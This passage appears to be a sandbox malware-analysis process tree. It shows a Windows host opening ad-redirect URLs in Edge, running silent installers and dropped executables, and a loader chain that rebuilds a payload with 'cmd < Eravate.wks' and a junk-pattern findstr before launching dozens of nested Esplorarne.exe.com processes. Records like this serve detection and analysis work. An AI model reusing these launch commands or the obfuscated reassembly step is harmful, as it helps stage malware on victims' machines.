"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
9⤵
PID:4508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff9c7fe46f8,0x7ff9c7fe4708,0x7ff9c7fe4718
10⤵
PID:3212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
9⤵
PID:3564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c7fe46f8,0x7ff9c7fe4708,0x7ff9c7fe4718
10⤵
PID:3140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
9⤵
PID:6124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c7fe46f8,0x7ff9c7fe4708,0x7ff9c7fe4718
10⤵
PID:5364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
9⤵
PID:6260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c7fe46f8,0x7ff9c7fe4708,0x7ff9c7fe4718
10⤵
PID:5552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
9⤵
PID:5880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1c4,0x1c8,0x1cc,0x1c0,0x1d0,0x7ff9c7fe46f8,0x7ff9c7fe4708,0x7ff9c7fe4718
10⤵
PID:7632

C:\Users\Admin\AppData\Local\Temp\28-a8e13-9e9-75283-460a94795d744\SHulebeqiku.exe
"C:\Users\Admin\AppData\Local\Temp\28-a8e13-9e9-75283-460a94795d744\SHulebeqiku.exe"
8⤵
PID:6960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pn0mf2x1.2lx\GcleanerEU.exe /eufive & exit
9⤵
PID:5080

C:\Users\Admin\AppData\Local\Temp\pn0mf2x1.2lx\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\pn0mf2x1.2lx\GcleanerEU.exe /eufive
10⤵
PID:1776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 256
11⤵
- Program crash
PID:6880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5btmiwxe.vwe\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:7384

C:\Users\Admin\AppData\Local\Temp\5btmiwxe.vwe\installer.exe
C:\Users\Admin\AppData\Local\Temp\5btmiwxe.vwe\installer.exe /qn CAMPAIGN="654"
10⤵
PID:6032

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5btmiwxe.vwe\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5btmiwxe.vwe\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407960 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
11⤵
PID:3724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1m1ybusl.khp\ufgaa.exe & exit
9⤵
PID:7732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vlkjyxu2.d03\anyname.exe & exit
9⤵
PID:4068

C:\Users\Admin\AppData\Local\Temp\vlkjyxu2.d03\anyname.exe
C:\Users\Admin\AppData\Local\Temp\vlkjyxu2.d03\anyname.exe
10⤵
PID:8132

C:\Users\Admin\AppData\Local\Temp\vlkjyxu2.d03\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\vlkjyxu2.d03\anyname.exe" -q
11⤵
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 676
12⤵
- Program crash
PID:7292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pa4fufry.4al\gcleaner.exe /mixfive & exit
9⤵
PID:5028

C:\Users\Admin\AppData\Local\Temp\pa4fufry.4al\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\pa4fufry.4al\gcleaner.exe /mixfive
10⤵
PID:2260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 256
11⤵
- Program crash
PID:2460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cfcscyj.r21\autosubplayer.exe /S & exit
9⤵
PID:8004

C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
5⤵
- Executes dropped EXE
PID:1592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 1772
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6544

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
5⤵
- Executes dropped EXE
PID:5648

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
6⤵
PID:5952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5952 -s 916
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6508

C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
5⤵
- Executes dropped EXE
PID:5980

C:\Users\Admin\AppData\Local\Temp\tmpEE58_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpEE58_tmp.exe"
6⤵
PID:5696

C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
7⤵
PID:7720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
7⤵
PID:3512

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:444

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
9⤵
PID:7696

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
9⤵
PID:816

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
10⤵
PID:3132

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
11⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
12⤵
PID:6820

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
13⤵
PID:4236

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
14⤵
PID:7644

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
15⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
16⤵
PID:4552

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
17⤵
PID:5936

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
18⤵
PID:6512

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
19⤵
PID:7952

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
20⤵
PID:2056

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
21⤵
PID:4952

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
22⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
23⤵
PID:3980

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
24⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
25⤵
PID:2200

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
26⤵
PID:3080

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
27⤵
PID:1056

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
28⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
29⤵
PID:7516

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
30⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
31⤵
PID:3352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
32⤵
PID:5536

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
33⤵
PID:7360

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
34⤵
PID:7164

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
35⤵
PID:1460

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
36⤵
PID:7060

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
37⤵
PID:240

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
38⤵
PID:6352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
39⤵
PID:6440

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
40⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
41⤵
PID:7128

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
42⤵
PID:7888

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
43⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8140

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
44⤵
PID:3808

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
45⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
46⤵
PID:6332

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
47⤵
PID:5876

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
48⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
49⤵
PID:8164

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
50⤵
PID:4136

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
51⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
52⤵
- Executes dropped EXE
PID:5328

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
53⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7748

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
54⤵
PID:4756

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
55⤵
PID:7276

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
56⤵
PID:7228

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
57⤵
PID:2212

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
58⤵
- Executes dropped EXE
PID:3352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
59⤵
PID:6400

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
60⤵
PID:3060

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
61⤵
PID:4764

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
62⤵
PID:4204

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
63⤵
PID:2440

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
64⤵
PID:7672

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
65⤵
PID:7328

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
66⤵
PID:6304

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
67⤵
PID:2052

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
68⤵
PID:2560

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
69⤵
PID:5932

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
70⤵
PID:6644

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
71⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
72⤵
PID:3344

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
73⤵
PID:6536

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
74⤵
PID:5552

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
75⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
76⤵
PID:7452

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
77⤵
PID:6516

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
78⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
79⤵
PID:2408

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
80⤵
PID:1104

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
81⤵
PID:5616

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
82⤵
PID:4576

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
83⤵
PID:1612

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
84⤵
PID:4060

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
85⤵
PID:8132

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
86⤵
PID:7252

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
87⤵
PID:5160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
88⤵
PID:7888

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
89⤵
PID:4560

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
90⤵
PID:8160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
91⤵
PID:5784

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
92⤵
PID:4112

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
93⤵
PID:2440

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
94⤵
PID:2580

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
95⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
96⤵
PID:1924

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
97⤵
PID:2136

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
98⤵
PID:7620

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
99⤵
PID:6236

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
100⤵
PID:4160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
101⤵
PID:6304

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
102⤵
PID:2752

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
103⤵
PID:1404

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
104⤵
PID:5936

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
105⤵
PID:1912

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
